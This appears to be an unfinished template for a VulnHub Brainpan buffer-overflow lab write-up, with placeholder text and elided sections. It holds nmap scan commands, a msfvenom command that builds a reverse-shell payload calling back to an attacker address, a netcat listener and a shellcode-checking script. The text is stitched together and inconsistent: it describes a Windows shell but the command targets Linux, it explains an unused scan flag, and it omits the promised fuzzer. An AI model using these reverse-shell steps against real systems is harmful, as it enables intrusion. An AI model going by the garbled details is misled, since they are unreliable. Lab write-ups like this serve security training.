What is the environment of the target? What kind of technology is needed for the attack? What is the purpose of the process?
The exploit development process in this post follows these eight steps:
Example:
Step 1 Fuzzing
Step 2 Replicating the Crash
Step 3 Finding the Offset to the EIP Register
Step 4 Controlling the EIP Register
Step 5 Finding Space for Shellcode
Step 6 Finding Bad Characters
Step 7 Jumping to the ESP Register
Step 8 Writing the Exploit
A Windows host or virtual machine
A Kali Linux host or virtual machine
OllyDbg
Python
Searchsploit
Firefox
Msfvenom
We are required to fill out this penetration testing document fully and to include the following sections:
Example:
Because VulnHub virtual machines are distributed as downloadable, self-hosted images, the machine gets its IP address from DHCP when it boots. Unlike online challenges such as Hack The Box, the IP address of the target is therefore “unknown” beforehand.
The first thing to find out is the local network address, using the ip addr (or ifconfig) command, and then sweep that subnet for live hosts.
nmap -sP 192.168.33.0/24
Running an initial scan with Nmap reveals that ports 9999 and 10000 are open.
nmap -n -sV -Pn -T4 192.168.33.129 -oA nmap/initial
Command explanation:
nmap - network scanner used to discover hosts and the services running on them.
-n - no DNS resolution.
-sC - perform a script scan using the default scripts.
-sV - perform service version detection.
-oA - output in all formats (normal, grepable and XML) with the given base name.
-Pn - treat the host as online and skip host discovery (this was necessary for the Nmap scan on this machine).
A dirb scan reveals an interesting bin directory.
Visiting the bin directory in the Firefox browser reveals a downloadable executable named brainpan.exe.
Suspecting that the exe application is vulnerable to a buffer overflow, a simple Python fuzzer can be written to test this.
Now that we know the brainpan.exe application is vulnerable to a buffer overflow, it is time to configure the debugging environment to help develop an exploit. Make sure to start OllyDbg as Administrator; a window like the one below should appear.
...
It is time to finish the exploit by generating and adding some shellcode.
Msfvenom can be leveraged to generate a Windows reverse shell shellcode that connects back to a listener on our attacking machine. Make sure to exclude any bad characters that were found in Step 6 with the -b option. The generated shellcode is 351 bytes long, which neatly fits in the 522 C’s we have added to our buffer variable.
Note the use of EXITFUNC=thread: the shellcode then exits only its own thread rather than the whole process, which makes a crash of the application less likely when the shell exits.
Command explanation:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.33.110 LPORT=4444 EXITFUNC=thread -a x86 --platform linux -b "\x00" -f c > sheelcode_linux_test.txt
msfvenom - the payload generation tool from Rapid7 (the creators of Metasploit).
LHOST - attacker IP address the payload connects back to.
LPORT - attacker TCP port the payload connects back to.
Options:
-p, --payload Payload to use. Specify a '-' or stdin to use custom payloads
--payload-options List the payload's standard options
-l, --list [type] List a module type. Options are: payloads, encoders, nops, all
-n, --nopsled Prepend a nopsled of [length] size on to the payload
-f, --format Output format (use --help-formats for a list)
--help-formats List available formats
-e, --encoder The encoder to use
-a, --arch The architecture to use
--platform The platform of the payload
--help-platforms List available platforms
-s, --space The maximum size of the resulting payload
--encoder-space The maximum size of the encoded payload (defaults to the -s value)
-b, --bad-chars The list of characters to avoid example: '\x00\xff'
-i, --iterations The number of times to encode the payload
-c, --add-code Specify an additional win32 shellcode file to include
-x, --template Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --out Save the payload
-v, --var-name Specify a custom variable name to use for certain output formats
--smallest Generate the smallest possible payload
-h, --help Show this message
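As an added example (not code from the original post), a small Python check to run on the msfvenom output before it goes into the exploit: it decodes the -f c text back into bytes, confirms that none of the Step 6 bad characters are present and that the payload fits in the 522 bytes of C’s, and pads the remainder with the same filler. The sample output and the bad-character list containing only "\x00" are assumptions constructed for this example.

```python
import re

# Bad characters found in Step 6. The page's msfvenom command excludes
# "\x00"; any further bytes would be added here (assumption for this example).
BAD_CHARS = b"\x00"
# Space the page has available for shellcode: the 522 C's in the buffer.
AVAILABLE_SPACE = 522

# Constructed stand-in for msfvenom '-f c' output (not real shellcode).
SAMPLE_OUTPUT = r'''unsigned char buf[] =
"\x90\x90\x31\xc0\x50"
"\x68\x2f\x2f\x73\x68";
'''

def parse_msfvenom_c_output(text):
    """Decode the C char-array form (\\xNN escapes inside quoted strings)
    back into raw bytes so the payload can be inspected before it is used."""
    fragments = re.findall(r'"((?:\\x[0-9a-fA-F]{2})*)"', text)
    pairs = re.findall(r'\\x([0-9a-fA-F]{2})', "".join(fragments))
    return bytes(int(h, 16) for h in pairs)

def check_shellcode(shellcode, bad_chars=BAD_CHARS, space=AVAILABLE_SPACE):
    """Report length, whether it fits in the buffer, how much filler remains,
    and the offset of every byte that is on the bad-character list."""
    hits = [(i, b) for i, b in enumerate(shellcode) if b in bad_chars]
    return {
        "length": len(shellcode),
        "fits": len(shellcode) <= space,
        "padding_needed": max(space - len(shellcode), 0),
        "bad_char_hits": hits,
    }

def pad_shellcode(shellcode, space=AVAILABLE_SPACE, filler=b"C"):
    """Pad to exactly `space` bytes with the filler the page's buffer already
    uses, so the total length sent to the service stays the same."""
    report = check_shellcode(shellcode, space=space)
    if not report["fits"]:
        raise ValueError("%d-byte shellcode exceeds %d bytes" % (len(shellcode), space))
    if report["bad_char_hits"]:
        raise ValueError("bad characters at offsets %r" % report["bad_char_hits"])
    return shellcode + filler * report["padding_needed"]

if __name__ == "__main__":
    sc = parse_msfvenom_c_output(SAMPLE_OUTPUT)
    print(check_shellcode(sc))
```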
nc -nvlp 4444
nc - netcat, a TCP and UDP tool for making connections and listening for them.
-n - no DNS resolution.
-v - verbose output.
-l - listen for incoming connections.
-p - port number to listen on.
……
…..
…..
……
This challenge helped me understand the process behind xxx and what goes on under the xxx a lot better. Documenting the process ……